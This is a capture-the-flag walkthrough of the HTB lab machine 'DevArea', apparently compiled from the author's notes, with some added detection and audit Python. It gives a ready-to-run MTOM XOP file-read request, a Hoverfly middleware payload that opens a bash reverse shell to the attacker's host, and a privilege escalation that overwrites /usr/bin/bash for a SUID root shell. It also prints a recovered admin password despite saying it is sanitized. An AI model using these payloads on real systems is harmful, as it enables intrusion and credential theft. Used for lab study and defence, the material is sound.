
DevArea - Full

DevArea is a Medium Linux HTB machine featuring a 4-phase attack chain: FTP reconnaissance, Apache CXF SSRF via MTOM (<secret redacted>), Hoverfly middleware RCE, and privilege escalation through a world-writable bash binary. Anonymous FTP login reveals a JAR...

Difficulty: Medium. Published 2025-12-19. Sanitized local writeup.

Scenario

DevArea - Full attack path

Objective

Machine walkthrough focused on evidence, validation, and reusable operator lessons.

DevArea - Full sanitized attack graph

Walkthrough flow

  1. FTP anonymous access reveals employee-service.jar
  2. Apache CXF SOAP service vulnerable to (MTOM XOP...
  3. Hoverfly systemd service leaks admin credentials
  4. Hoverfly middleware RCE gives shell as dev_ryan
  5. /usr/bin/bash is world-writable, exploitable via sudo...

Source coverage

Moderate source coverage

Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

75% coverage

Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-DevArea/walkthrough.md
  • HTB/<TARGET>-DevArea/notes.md

Technical Walkthrough

DevArea - Full Walkthrough

Overview

DevArea is a Medium Linux HTB machine featuring a 4-phase attack chain: FTP reconnaissance, Apache CXF SSRF via MTOM (<secret redacted>), Hoverfly middleware RCE, and privilege escalation through a world-writable bash binary.

Phase A: FTP Reconnaissance

Anonymous FTP login reveals a JAR file in the pub directory:

```bash
ftp -n <TARGET> <<EOF
user anonymous anonymous
binary
cd pub
mget *
bye
EOF
```

Downloaded: employee-service.jar — decompiling reveals a SOAP endpoint at http://devarea.htb:8080/employeeservice with a submitReport operation.

The WSDL confirms the namespace and operations:

```bash
curl -s 'http://devarea.htb:8080/employeeservice?wsdl'
```

Phase B: <secret redacted> - Apache CXF SSRF via MTOM XOP Include

The SOAP service uses Apache CXF with MTOM support. An xop:Include is supposed to reference an attachment part by a cid: URI, but the vulnerable CXF build resolves whatever href it is given, including file://, so the server reads a local file and returns its contents in the response.

Critical: The request MUST be multipart/related with MIME boundaries. A plain SOAP POST won't trigger the vulnerability.

```bash
curl -s "http://devarea.htb:8080/employeeservice" \
-H 'Content-Type: multipart/related; type="application/xop+xml"; boundary="MIMEBoundary"; start="<<email redacted>>"; start-info="text/xml"' \
--data-binary '--MIMEBoundary
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: 8bit
Content-ID: <<email redacted>>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ns2:submitReport xmlns:ns2="http://devarea.htb/">
      <arg0>
        <content><xop:Include href="file:///etc/systemd/system/hoverfly.service" xmlns:xop="http://www.w3.org/2004/08/xop/include"/></content>
        <employeeName>test</employeeName>
        <department>test</department>
        <confidential>false</confidential>
      </arg0>
    </ns2:submitReport>
  </soap:Body>
</soap:Envelope>

--MIMEBoundary--'
```

The response contains base64-encoded file content. Decoding reveals:

  • Hoverfly credentials: admin:O7IJ27MyyXiU
  • Service runs as user dev_ryan
  • Binary at /opt/HoverFly/hoverfly
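As an added detection example (not code from the writeup or from Apache CXF), the following Python flags any xop:Include whose href is not a cid: reference to an attachment part, which is exactly the file:// pattern above. find_unsafe_xop_hrefs and SAMPLE_REQUEST are my own names; the sample is a constructed request with a placeholder Content-ID.

```python
# Added detection example (not code from the writeup or from Apache CXF): flag
# xop:Include hrefs that reach outside the MIME envelope. A legitimate Include
# references an attachment part by cid: URI; any other scheme is the
# SSRF/file-read pattern above. Input is the raw multipart entity a WAF or
# reverse proxy has already read (Content-Type line, blank line, body).
import email
from email import policy
from urllib.parse import urlparse
from xml.etree import ElementTree as ET  # prefer defusedxml in production

XOP_INCLUDE = "{http://www.w3.org/2004/08/xop/include}Include"


def find_unsafe_xop_hrefs(raw_entity: bytes) -> list[str]:
    """Return every xop:Include href whose scheme is not cid:."""
    msg = email.message_from_bytes(raw_entity, policy=policy.default)
    if msg.get_content_type() != "multipart/related":
        return []  # plain SOAP POST: no XOP resolution happens
    flagged = []
    for part in msg.iter_parts():
        if part.get_content_type() != "application/xop+xml":
            continue  # attachments are opaque; Includes live in the root part
        try:
            root = ET.fromstring(part.get_payload(decode=True))
        except ET.ParseError:
            continue
        for inc in root.iter(XOP_INCLUDE):
            href = inc.get("href", "")
            if urlparse(href).scheme.lower() != "cid":
                flagged.append(href)
    return flagged


# Constructed sample with the shape of the request above (Content-ID is a
# placeholder; the file path is the one the writeup reads).
SAMPLE_REQUEST = b"""Content-Type: multipart/related; type="application/xop+xml"; boundary="MIMEBoundary"; start="<root>"; start-info="text/xml"

--MIMEBoundary
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-ID: <root>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>
<ns2:submitReport xmlns:ns2="http://devarea.htb/"><arg0><content>
<xop:Include href="file:///etc/systemd/system/hoverfly.service"
 xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
</content></arg0></ns2:submitReport></soap:Body></soap:Envelope>
--MIMEBoundary--
"""
```

A plain text/xml POST returns an empty list, matching the note above that only multipart/related requests reach the XOP code path.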

Phase C: Hoverfly Middleware RCE

Step 1: Get JWT Token

```bash
curl -s -X POST http://devarea.htb:8888/api/token-auth \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"<redacted>"}'
```

Step 2: Set Middleware (reverse shell)

Hoverfly pipes each request through the middleware script and reads the result back from stdout (it also validates the script this way as soon as it is PUT), so the script must copy stdin to stdout AND spawn the shell in the background:

```bash
curl -s -X PUT "http://devarea.htb:8888/api/v2/hoverfly/middleware" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <JWT>" \
  -d '{"binary":"bash","script":"#!/bin/bash\ncat <(cat)\nbash -i >& /dev/tcp/<TARGET>/4444 0>&1 &"}'
```

Step 3: Switch Hoverfly to "modify" mode

In simulate mode, middleware only fires on matched simulations. Modify mode processes all requests:

```bash
curl -s -X PUT http://devarea.htb:8888/api/v2/hoverfly/mode \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <JWT>" \
  -d '{"mode":"modify"}'
```

Step 4: Start listener and trigger

```bash
nc -lvnp 4444  # on attacker

# Trigger via authenticated proxy request:
curl -x http://admin:<email redacted>:8500 http://www.test.com/
```

Result: Shell as dev_ryan. User flag at /home/dev_ryan/user.txt.

Phase D: Privilege Escalation - World-Writable Bash

Discovery

```bash
sudo -l
# (root) NOPASSWD: /opt/syswatch/syswatch.sh

ls -la /usr/bin/bash
# -rwxrwxrwx 1 root root 1446024 ... /usr/bin/bash
```

/usr/bin/bash is world-writable. The sudo script (syswatch.sh) uses bash as its interpreter. Overwriting bash with a malicious script and triggering it via sudo gives root code execution.

Exploitation

  1. Back up bash and switch to dash:

     ```bash
     cp /usr/bin/bash /tmp/bash.bak
     exec /bin/dash
     ```

  2. Kill all bash processes (to release the "Text file busy" lock):

     ```bash
     /bin/dash -c "killall -9 bash"
     ```

  3. Overwrite /usr/bin/bash with the exploit:

     ```bash
     printf "#!/tmp/bash.bak\ncp /tmp/bash.bak /tmp/rootbash\nchmod 4755 /tmp/rootbash\n" > /usr/bin/bash
     ```

  4. Trigger via sudo (runs as root, calls /usr/bin/bash which is now our script):

     ```bash
     sudo /opt/syswatch/syswatch.sh --version
     ```

  5. Get root:

     ```bash
     /tmp/rootbash -p
     # euid=0(root)
     cat /root/root.txt
     ```
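As an added audit example (not code from the writeup), the following Python finds the condition this privesc relies on: a sudo-allowed script whose shebang interpreter, or the script file itself, is writable by everyone. audit_sudo_scripts and build_demo_tree are my own names; the demo layout is constructed in a temp dir rather than touching the real /usr/bin/bash.

```python
# Added audit example (not code from the writeup): report sudo-allowed scripts
# whose file or whose shebang interpreter is world-writable, the condition
# behind the /usr/bin/bash privesc above. Demo paths are constructed in a temp
# dir; on a real host pass the NOPASSWD commands from `sudo -l` instead.
import stat
import tempfile
from pathlib import Path
from typing import Optional


def world_writable(path: str) -> bool:
    """True if the 'other' write bit is set (ls shows -rwxrwxrwx or similar)."""
    try:
        return bool(Path(path).stat().st_mode & stat.S_IWOTH)
    except FileNotFoundError:
        return False


def interpreter_of(script: str) -> Optional[str]:
    """Return the path named on the script's #! line, or None if absent."""
    with open(script, "rb") as f:
        first = f.readline()
    parts = first[2:].split() if first.startswith(b"#!") else []
    return parts[0].decode() if parts else None


def audit_sudo_scripts(scripts: list[str]) -> list[tuple[str, str]]:
    """Return (script, problem) pairs. Either problem lets any local user
    run code as root once the script is runnable via sudo NOPASSWD."""
    findings = []
    for script in scripts:
        if world_writable(script):
            findings.append((script, "script is world-writable"))
        interp = interpreter_of(script)
        if interp and world_writable(interp):
            findings.append((script, f"interpreter {interp} is world-writable"))
    return findings


def build_demo_tree() -> tuple[str, str]:
    """Construct the vulnerable layout in a temp dir: a fake 'bash' with
    mode 0777 and a syswatch.sh whose #! line points at it."""
    d = Path(tempfile.mkdtemp())
    fake_bash = d / "bash"
    fake_bash.write_text("placeholder, not a real binary\n")
    fake_bash.chmod(0o777)
    script = d / "syswatch.sh"
    script.write_text(f"#!{fake_bash}\necho ok\n")
    script.chmod(0o755)
    return str(script), str(fake_bash)
```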

Lessons Learned

  1. Hoverfly mode matters: Middleware only fires in modify or synthesize mode, NOT simulate without matches.
  2. Middleware validation: Hoverfly tests the middleware script immediately on PUT. The listener must be ready AND the script must handle stdin/stdout properly.
  3. Text file busy: the kernel refuses to open a binary for writing while any process is executing it (ETXTBSY), so every process using it must be killed first, and the operator must already be running a different shell (dash) to survive that.
  4. Proxy auth: Port 8500 requires proxy authentication with the admin creds.

Attack Chain Summary

```text
FTP anon -> JAR -> WSDL -> <secret redacted> SSRF -> hoverfly.service -> creds
-> Hoverfly JWT -> middleware RCE -> shell as dev_ryan -> user.txt
-> sudo syswatch.sh -> world-writable /usr/bin/bash -> SUID rootbash -> root.txt
```

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Target Details

  • IP: <TARGET>
  • Hostname: devarea.htb
  • OS: Linux (Ubuntu)
  • Difficulty: Medium
  • Date: 2026-05-05
  • Attacker IP: <TARGET>

Services Discovered (nmap)

| Port | Service | Version |
| --- | --- | --- |
| 21 | FTP | vsftpd 3.0.5 (anonymous login) |
| 22 | SSH | OpenSSH 9.6p1 Ubuntu |
| 80 | HTTP | Apache 2.4.58 (devarea.htb) |
| 8080 | SOAP | Jetty 9.4.27 (Apache CXF) |
| 8500 | Proxy | Hoverfly proxy (authenticated) |
| 8888 | Admin | Hoverfly Dashboard (Go) |

Evidence Ledger

| Time | Action | Finding | Confidence |
| --- | --- | --- | --- |
| 05:14 | nmap scan | All 6 ports open as expected | VERIFIED |
| 05:17 | FTP anonymous | Downloaded employee-service.jar | VERIFIED |
| 05:18 | WSDL check | submitReport operation, namespace http://devarea.htb/ | VERIFIED |
| 05:20 | <secret redacted> | SSRF via MTOM XOP Include, read hoverfly.service | VERIFIED |
| 05:20 | Decode service | Creds: admin:O7IJ27MyyXiU, runs as dev_ryan | VERIFIED |
| 05:22 | Hoverfly auth | JWT token obtained | VERIFIED |
| 05:22 | Middleware RCE | Set bash reverse shell middleware | VERIFIED |
| 05:23 | Mode change | Switched from simulate to modify mode | VERIFIED |
| 05:24 | Trigger | Proxy request triggered shell as dev_ryan | VERIFIED |
| 05:24 | User flag | <hash redacted> | CAPTURED |
| 05:25 | sudo -l | Can run /opt/syswatch/syswatch.sh as root NOPASSWD | VERIFIED |
| 05:25 | Bash perms | /usr/bin/bash is world-writable (-rwxrwxrwx) | VERIFIED |
| 05:27 | Privesc | Overwrote bash with SUID cp script, triggered via sudo | VERIFIED |
| 05:28 | Root flag | <hash redacted> | CAPTURED |

Credentials

| Username | Password | Service | Notes |
| --- | --- | --- | --- |
| anonymous | (any) | FTP | Anonymous login |
| admin | O7IJ27MyyXiU | Hoverfly (8888/8500) | From systemd service file |

Key Findings

  1. FTP anonymous access reveals employee-service.jar
  2. Apache CXF SOAP service vulnerable to <secret redacted> (MTOM XOP SSRF/file read)
  3. Hoverfly systemd service leaks admin credentials
  4. Hoverfly middleware RCE gives shell as dev_ryan
  5. /usr/bin/bash is world-writable, exploitable via sudo syswatch.sh

Flags

  • User: <hash redacted>
  • Root: <hash redacted>